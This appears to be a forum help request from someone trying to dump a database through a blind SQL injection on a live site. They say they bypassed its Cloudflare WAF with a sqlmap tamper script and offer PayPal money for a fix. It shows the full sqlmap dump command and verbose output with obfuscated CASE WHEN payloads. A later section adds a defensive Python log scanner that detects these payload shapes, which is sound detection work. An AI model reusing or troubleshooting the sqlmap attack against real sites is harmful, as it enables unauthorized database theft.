I found a blind SQLi vulnerability; the site is protected by the Cloudflare WAF, but I bypassed it with a tamper script in sqlmap. I got the DB, table and column names, but when I try --dump and --parse-errors I get:
Unable to retrieve the number of column(s)
I ran --is-dba and got False. It doesn't work with --no-cast or --hex either. Any ideas, please?
I'll donate via PayPal if this gets solved, thanks.
Payload:
sqlmap.py -u "www.web.org/vuln=" --technique=B --level=5 --risk=3 --cookie="cookies" --random-agent -D base -T table -C column1,column2 --dump --tamper="nonrecursivereplacement" -v 3 --no-cast
Output:
[19:33:39] [INFO] testing connection to the target URL
[19:33:44] [INFO] heuristics detected web page charset 'windows-1251'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (CASE) (original value)
Payload: http://ww.xx/yy.php?zz=(CASE WHEN 6311=6311 THEN 2 ELSE NULL END)&aa=bb
Vector: (CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)
---
[19:33:44] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[19:33:44] [INFO] testing MySQL
[19:33:44] [DEBUG] resuming configuration option 'string' cc
[19:33:44] [INFO] confirming MySQL
[19:33:44] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.44
back-end DBMS: MySQL >= 5.0.0
[19:33:44] [INFO] fetching entries of column(s) 'column1, column2' for table 'table' in database 'database'
[19:33:44] [INFO] fetching number of column(s) 'column1, column2' entries for table 'table' in database 'database'
[19:33:44] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[19:33:44] [WARNING] currently only couple of keywords are being processed ('UNION', 'SELECT', 'INSERT', 'UPDATE', 'FROM', 'WHERE'). You can set it manually according to your needs
[19:33:44] [PAYLOAD] (/!CASE//!WHEN/ORD(MID((/!SESELECTLECT//!IFNULL/(CAST(COUNT()/!AS*//!CHAR/),0x20)/!FROFROMM/database.table),1,1))/!NOT//!BETWEEN/0/!AND/51/!THEN/2/!ELSE//!NULL//!END/)
[19:33:44] [INFO] heuristics detected web page charset 'ascii'
[19:33:44] [PAYLOAD] (/!CASE//!WHEN/ORD(MID((/!SELESELECTCT//!IFNULL/(CAST(COUNT()/!AS*//!CHAR/),0x20)/!FFROMROM/database.table),1,1))/!NOT//!BETWEEN/0/!AND/48/!THEN/2/!ELSE//!NULL//!END/)
[19:33:45] [PAYLOAD] (/!CASE//!WHEN/ORD(MID((/!SELSELECTECT//!IFNULL/(CAST(COUNT()/!AS*//!CHAR/),0x20)/!FROFROMM/database.table),1,1))/!NOT//!BETWEEN/0/!AND/1/!THEN/2/!ELSE//!NULL//!END/)
[19:33:45] [INFO] retrieved:
[19:33:45] [DEBUG] performed 3 queries in 1.06 seconds
[19:33:45] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[19:33:45] [WARNING] unable to retrieve the number of column(s) 'column1, column2' entries for table 'table' in database 'database'
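From the defender's side, the output above shows exactly what this traffic looks like in an access log: a boolean-blind inference wrapped in CASE WHEN ... THEN <original value> ELSE NULL END, keywords wrapped in MySQL versioned comments (/*!...*/), and keywords spliced into themselves by the tamper script (SESELECTLECT, FROFROMM). The following is an added example, not code from the original post or from sqlmap; the log lines are constructed here, and the script names (scan_log, analyse_query) are my own.

```python
import re
from urllib.parse import quote, unquote_plus, urlsplit

# Shape of the boolean-blind vector shown in the post:
#   (CASE WHEN <inference> THEN <original value> ELSE NULL END)
CASE_RE = re.compile(r"\bCASE\s+WHEN\b.+?\bTHEN\b.+?\bELSE\s+NULL\s+END\b", re.I | re.S)
REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
KEYWORDS = ("SELECT", "FROM", "WHERE", "UNION", "INSERT", "UPDATE")


def doubled_keywords(text):
    """Return keywords present in self-spliced form, e.g. SELSELECTECT or FROFROMM."""
    up = text.upper()
    hits = set()
    for kw in KEYWORDS:
        for i in range(1, len(kw)):          # keyword inserted at every interior position
            if kw[:i] + kw + kw[i:] in up:
                hits.add(kw)
    return sorted(hits)


def analyse_query(query):
    """Classify one URL query string; returns a list of findings (empty if clean)."""
    decoded = unquote_plus(query)
    # Unwrap MySQL versioned comments so the inference skeleton is visible to CASE_RE.
    stripped = re.sub(r"/\*!\s*|\*/", " ", decoded)
    findings = []
    if CASE_RE.search(stripped):
        findings.append("boolean-blind CASE inference")
    if "/*!" in decoded:
        findings.append("versioned-comment obfuscation")
    doubled = doubled_keywords(stripped)
    if doubled:
        findings.append("doubled keywords: " + ",".join(doubled))
    return findings


def scan_log(lines):
    """Return (client_ip, findings) for every access-log line that looks like blind SQLi."""
    results = []
    for line in lines:
        m = REQ_RE.search(line)
        if not m:
            continue
        findings = analyse_query(urlsplit(m.group(1)).query)
        if findings:
            results.append((line.split()[0], findings))
    return results


def make_log(ip, path, query):
    """Build a constructed Apache-style access-log line (sample data, not real traffic)."""
    return f'{ip} - - [10/Oct/2023:19:33:44 +0000] "GET {path}?{quote(query, safe="=&")} HTTP/1.1" 200 512'


SAMPLE_LOGS = [  # constructed samples mirroring the post's payload shapes
    make_log("203.0.113.5", "/yy.php", "zz=(CASE WHEN 6311=6311 THEN 2 ELSE NULL END)&aa=bb"),
    make_log("203.0.113.5", "/yy.php", "zz=(/*!CASE*//*!WHEN*/ORD(MID((/*!SESELECTLECT*/ 1),1,1)) NOT BETWEEN 0 AND 51 THEN 2 ELSE NULL END)&aa=bb"),
    make_log("198.51.100.7", "/yy.php", "zz=2&aa=bb"),
]

if __name__ == "__main__":
    for ip, findings in scan_log(SAMPLE_LOGS):
        print(ip, findings)
```

The second and third checks only catch the keyword tricks visible in this post; a WAF or log review should treat the CASE ... ELSE NULL END skeleton itself as the durable signal, since tamper scripts change the keyword spelling but not the inference structure.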